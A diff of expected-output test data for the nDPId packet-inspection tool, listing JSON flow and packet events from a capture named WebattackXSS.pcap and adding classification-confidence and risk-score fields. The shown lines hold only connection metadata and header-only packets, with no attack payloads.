 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1499347138553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347138553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0erhAAD4GSyCsEAABwKgKMtL+AFByz\/R\/tb4S54AQAOUHhAAAAQEICgE5jskD42A\/"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347024196,"flow_last_seen":1499347029616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347140650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347141111,"flow_last_seen":1499347141111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347141111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1499347141111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347141111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OEpAAD4GjYasEAABwKgKMtMYAFBIRqkCAAAAAKACchAH0QAAAgQFtAQCCAoBOZFIAAAAAAEDAwc="}
@@ -500,17 +500,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1499347150236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347150236,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ESlAAD4GtKesEAABwKgKMtN2AFB3vosbAAAAAKACchDs9wAAAgQFtAQCCAoBOZoyAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1499347150236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347150236,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ03aiL1kKd76LHKAScSCDEQAAAgQFtAQCCAoD42uoATmaMgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1499347150237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347150237,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ESpAAD4GtK6sEAABwKgKMtN2AFB3voscoi9ZC4AQAOUiGQAAAQEICgE5mjID42uo"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347025509,"flow_last_seen":1499347030616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347028086,"flow_last_seen":1499347033617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347029372,"flow_last_seen":1499347034616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"ts_msec":1499347151265,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347151520,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347151520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347151520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82ilAAD4G66asEAABwKgKMtOEAFDVpkFaAAAAAKACchDXgQAAAgQFtAQCCAoBOZtzAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347151520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ04RMTDZ61aZBW6AScSDkzQAAAgQFtAQCCAoD42zpATmbcwEDAwc="}
@@ -535,15 +535,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1499347160581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347160581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eT9AAD4GTJGsEAABwKgKMtPiAFBG+91zAAAAAKACchDA3AAAAgQFtAQCCAoBOaRMAAAAAAEDAwc="}
